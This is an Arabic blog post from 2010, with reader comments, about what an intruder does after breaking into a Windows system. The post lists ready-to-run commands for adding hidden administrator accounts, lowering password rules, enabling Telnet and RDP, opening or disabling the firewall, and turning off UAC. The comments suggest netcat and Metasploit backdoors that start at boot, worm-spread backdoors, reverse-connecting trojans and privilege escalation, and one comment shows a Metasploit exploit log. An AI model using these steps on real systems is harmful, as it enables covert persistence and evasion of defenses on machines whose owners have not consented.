[نقاش] ماهو أول شئ تفعله بعد اختراقك لنظام ويندوز ؟!
الكاتب: صبري صالح | يوم: 28 أغسطس, 2010 | التعليقات: 20 | القراءات: - عدد المشاهدات 31٬948
لك منا بعض الخطوات التي يعملها بعد اختراق الويندوز, بعيد عن فكرة التخريب نفسها فمنا من يحب أن يرجع إلى النظام و منا من يحب أن يستخدم النظام في أغراض الهجوم أو التخفي , إلخ,,
لهذا أحببت أن نكتب كيف من الممكن أن نستفيد من النظام اللذي تم اختراقه و كيفيه المحافظه عليه للعودة إليه مرة أخرى و كيفية استغلال ذلك الاغتراق لصالحنا.
النقاش يشمل التالي:
- ضمان العودة إلى النظام مرة أخرى
- التقاط البيانات و كلمات المرور
- تشغيل و إطفاء الخدمات
- التعامل مع برامج الحماية (Antivirus , Anti Spyware , Firewalls)
- مسح الأثار
- مهارات أخرى
ملاحظة: سأجعل لكل نظام موضوع مستقل لكي يكون مرجعا لنا و سأقوم بتحديث الموضوع بناء على الإضافات من الزوار مع الحفاظ على حقوق المعلومة لمن أضافها
المستخدمين و المجموعات
حسنا في حالات التدريب و الاختراق التخريبي و الاختراق للتحدي ننشئ مستخدم بأسمائنا أو بألقابنا و لكني أحيانا أحبذ أن أستخدم أحد المستخدمين الموجودين و الغير مستخدمين أو إنشاء مستخدم شبيه بأسمائهم مع فارق بسيط في التجئة و التي قد لا ينتبه إليها مدير النظام.
– إضافة مستخدم و كلمة مرور
net user USER_NAME USER_PASS /add
مثال
net user KING sec4ar /add
– إضافة المستخدم إلى مجموعة المدراء Administrators
net localgroup administrators USER_NAME /add
مثال
net localgroup administrators KING /add
– تغيّير كلمة مرور المستخدم
سيطلب منك إدخال كلمة المرور مرتين متتاليتين
ملاحظة: هناك مسافة بين اسم المستخدم و علامة النجمة “*”
net user USER_NAME *
مثال
net user KING *
Type a password for the user:
Retype the password to confirm:
The command completed successfully
– لتقليل طول كلمة المرور المسموح بها
net accounts /minpwlen: length
مثال
net accounts /minpwlen: 0
هل تعلم أن بعد إضافة هذا المستخدم فإنه سيظهر في شاشة الدخول أو شاشة الترحيب(Welcome Screen) في بداية تشغيل الويندوز؟!
– لإزالة المستخدم من شاشة الترحيب(جعله مخفي)
1. اتصل فورا بالجهاز عن طريق الـ Remote Desktop
2. إذهب إلى قائمة إبدأ أو Start و اختر Run و اكتب regedit.exe
3. اذهب إلى المسار التالي
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\
3.1. في الجهة اليمنى, ابحث عن اسم المستخدم الذي أنشأت و انقر عليه نقرتين و غيِّر قيمته إلى صفر = 0 . فإن لم تجده !, إضغط الزر الأيمن بالفأرة و أختر ” New > DWORD Value ”
3.2. و أنشئ مفتاح جديد بنفس اسم المستخدم الذي تريده بالظبط
3.3. اجعل القيمة تساوي صفر
هكذا لن يظهر
Reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v UserName /t REG_DWORD /d 0
شكرا لأخي زياد و أخي أبو الوليد
– لتفعيل مستخدم افتراضي لكنه غير مفعل بشكل افتراضي في الويندوز
net user USER_NAME /acvtive:yes
مثال
net user HelpAssistant /acvtive:yes
الخدمات
– لتفعيل و تشغيل خدمة معينة
sc config Service_Name start= auto
net start Service_Name
– لعرض الخدمات الموجودة
sc query
الأن لنفعل الخدمات المهمة بالنسبة لنا
– تفعيل الـTelnet
sc config TlntSvr start= auto
net start TlntSvr
– تفعيل الـ Remote Desktop
sc config DcomLaunch start= auto
net start DcomLaunch
ملاحظة: يجب أن تفتح لهم Port في الجدار الناري. سأشرح ذلك لاحقا
المجلدات و الملفات
– لمشاركة مجلد أو ملف
NET SHARE sharename /USERS:numer /UNLIMITED /REMARK:"comment"
مثال
NET SHARE C:\inetpub\ftproot /UNLIMITED /REMARK:"KING-SABRI_Security4Arabs"
– تغيّر التصاريح
الحماية
– لإغلاق الجدار الناري (الجدار الناري الافتراضي مع الويندوز)
netsh firewall set opmode disable
لا أحبذ هذه الطريقة لأنها تظهر إنذار بذلك و يحبذ فتح المنافذ المطلوبه فقط
netsh firewall add portopening TCP PORT_NUMBER "Serv.Name"
مثال
netsh firewall add portopening TCP 23 "Telnet"
netsh firewall add portopening TCP 3389 "RDP"
– إغلاق الجدار الناري ISA
net stop mspfltex
– لإغلاق UAC (خاص بـ Vista ,Win7)
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
– مسح السجلات “Logs”
جاري العمل عليه,,
المهندس صبري صالح. مهندس حماية شبكات و أنظمة و فحصها معالجة و تحليل الأحداث الأمنية و المسؤول عن تطبيق معايير الـ ISO 27001 , يعمل في بيئات متعددة المنصات. حاصل على عدة شهادات تقنية.
التعليقات:
اترك تعليقاً | عدد التعليقات: (20)
السلام عليكم
من اﻷظفات الي انا احب أضيفة برضوة هي اليوزر مثلآ
admin
او اضيف ادمن ثاني مع أختﻻف الأحرف مثل
admistrator
تلاحضون انا في العنية ما كتبت I بعد حرف S
زي ما تقول حركة تموية في أسم المستخدم وأضيف يوزر زيادة في المجموعات خاصة اذا كانو عددت اليوزرات كثيرة
عليكم السلام ,, و هذا ما ذكرته أنا في فقرة “المستخدمين و المجموعات” أول أسطر كتبتها
أيضا أشرت إلى أننا نستطيع أن نفعل مستخدم موجود في الأصل لكنه لم يكن مفعل بشكل افتراضي و بالطبع سنضيفه إلى مجموعة المدراء
شكرا لمرورك
طيب لو كان الجهاز بيستخدم Dyn IP وانا كمان بستخدمه وعاوز ارجع للجهاز تانى ايه الحل ؟
السلام عليكم
شكرا لك أخي على الدرس
بالنسبة للأخ -واحد-فالطريقة المتداولة واللي تقدر أنك ترجع للموقع بعد اختراقه و هو الرووت كيت أخي
وشكرا
أخي واحد كلام Hit-Man صحيح. ولكن إذا كنت تقوم بعمل Penetration Testing فعندها على الأغلب لن تستطيع استخدام روت كيت لأنّ هذا يخالف قواعد الإشتباك.
بالنسبة للخطأ المستفز أظنه والله أعلم من غياب ال quotes في المسار “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\” و الكلمة reg تتواجد قبل add أظنك نسيتها سهوا اخي صبري…
متشكر على الموضوع المفيد.
مرحبا أخي أبو الوليد ,,
شكرا أخي على مساعدتك لكن ما لم أفهم موضوع الـ quotes حيث نستخدمها فقط إذا كان في الأمر أي علامات محجوزة أو مفاتيح للأوامر أو مسافة لكن هنا لا يوجد المكان المراد لا يوجد به مسافات ولا شئ.
الأمر الأخر لقد وجدت بالفعل أن reg.exe قبل الـ ADD فما المشكة , قد أكون لم أفهم قصدك جيدا
شكرا لمساعدتك و أتمنى أن نبني في هذا الموضوع قد المسطاع لكي يكون مرجعا لنا جميعا
تحياتي و احترامي لك أبو الوليد
السلام عليكم …..
انا دائماً لا افكر كيف اضمن العودة إلى النظام مرة أخرى لانه مثل ما ثم اختراقه في المرة الاولي يمكن اختراقه من جديد ولكن لا يمكن استبعاد هذه النقطة انها مهمة فعلاً.
ممكن عمل Task Scheduler في جهاز الضحية لي BackDoor تم رفعه في السابق وهذه النقطة صالحة في الحالتين Bind Shell و Reverse Shell .
السلام عليكم ورحمة الله وبركاته
في بداية كلامي أحب أن أشكرك على اختيار هذا الموضوع للنقاش
ومن أحد أفكاري بالموضوع لتثبيت الضحية ( العودة إليه مرة أخرى ) :
– استخدام ال netcat كأداة backdoor وهذا يتطلب منك بعد الدخول إلى جهاز الضحية رفع النت كات + وضع أمر للإتصال بالهكر مع بداية تشغيل الجهاز
– تشغيل خدمات على الجهاز، مثال ذلك ( ftp,telnet,tftp,smb …. )، وهنا يتطلب الموضوع رفع ال ftp server على جهاز الضحية + tftp server + تشغيل خدمة ال smb وال telnet
– ويمكن أيضا استخدام ال msfpayload في الميتاسبلويت لعمل ملف تنفيذي exe وتشغيله على الجهاز ثم تثبيته عن طريق ال metsvc ( وهكذا سيشتغل مع بداية تشغيل الجهاز )
– ويمكن أيضا استخدام دودة لنشر باكدوور في الجهاز ( وأي شيء يدخل إلى الجهاز مثلا الفلاش أو السيدي …. ) وذلك للحفاظ أكثر على الضحية
– معرفة البرامج الموجودة على الجهاز مع اصداراتها والبحص عن ثغرات من نوع remote buffer overflow حيث يمكنك استغلالها وقت الحاجة لها
هذا هي أفكاري الحالية
إن شاء الله سيكون هنالك أفكار مستقبلية
وياريت لو نشوف أفكار حول موضوع مسح الأثار
تحياتي
[…] المصدر […]
انا دائما الاختراقات التي اقوم بها يكون البيلود الدوس و المهم في الامر انه جميع الادوات التي تستعمل في بيئة الدوس جيد جدا
مثل : ادوات سحب جميع الباسوردات المخزنة في الجهاز تعمل في بيئة الدوس طبعا يجب ان يكون لديك اف تي بي سيرفر لرفعها الي جهاز الضحية.
السلام عليكم
موضوع جميل لكن ماذا بشأن الحمايات ؟؟؟
عندي سيرفر ويندوز 2003 لايقبل امر اضافة مستخدم او تشغيل \ايقاف خدمة
sc config TlntSvr start= auto
[SC] OpenService FAILED 5:
Access is denied.
مالحل بهكذا حالة ؟؟؟
ودمتم
@ Try To be IT : شكرا لإضافاتك أخي
و طريقة تفكيرة جيدة , بالنسبة للـNetcat فهو ممتاز في السيناريوهات التجريببية , لكن عندما يكون على بيئة حقيقية فأنك لن تثق به لسهولة اكتشافه من المكافحات و أيضا قلة إمكانيات الـNetcat نفسه
حاول تستخدم Trojan من الأشياء الحديثة و يكون لها عدة إمكانيات
@ali_m: أخي تأكد أنك اخترقت بصلاحيات Administrator أو System أو مستخدم له صلاحيات المدير
ما عدا ذلك لن تستطيع تنفيذ هذه الأوامر إلى بتصعيد صلاحياتك ممكن تستخدم “getsystem” في مشروع الميتاسبلويت
الأخ صبري صالح
شكرا لتعقيبك لكن لو توضح ماالقصد ب ?getsystem
أخوي علي, هي أداة لتصعيد الصلاحيات على النظام في حين أن صلاحياتك هي صلاحيات مستخدم عادي
أخ صبري كلامك سليم 100%
طبقت أمر whoami وكانت النتيجة
nt authority\network service
رغم أن جميع محاولاتي للاختراق باستخدام مشروع metasploit فشلت لكن سأجرب getsystem الذي تحدثت عنه
سؤال آخر :
السيرفر خلف راوتر له real ip طبعا لكن هل يؤثر ذلك على تشغيل تروجان مشفر بالسيرفر حيث لم تنجح محاولتي بالتروجان
وهل أستطيع (فيما لو تم تفعيل Rdp) الاتصال به ؟
وشكرا للأخ صبري ولصاحب المدونة الرائعة
استخدم الاتصال العكسي في التروجان
بالنسبة للـ RDP افتح Tunnel لأنك لن تستطيع أن تتصل به مباشرة بالطريقة التقليدية لأن هناك NATing يحصل
http://www.security4arabs.com/2010/08/12/hack-into-natted-network-via-ssh-tunnel/
تحياتي واحترامي
[…] Click hear to read whole topic → […]
هذه نتيجة اختراق بالميتاسبلويت ماذا افعل بعد ذلك
[*] Started reverse handler on 192.168.183.129:80
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 3 – lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
ارجو التواصل معاك للاهمية وشكرا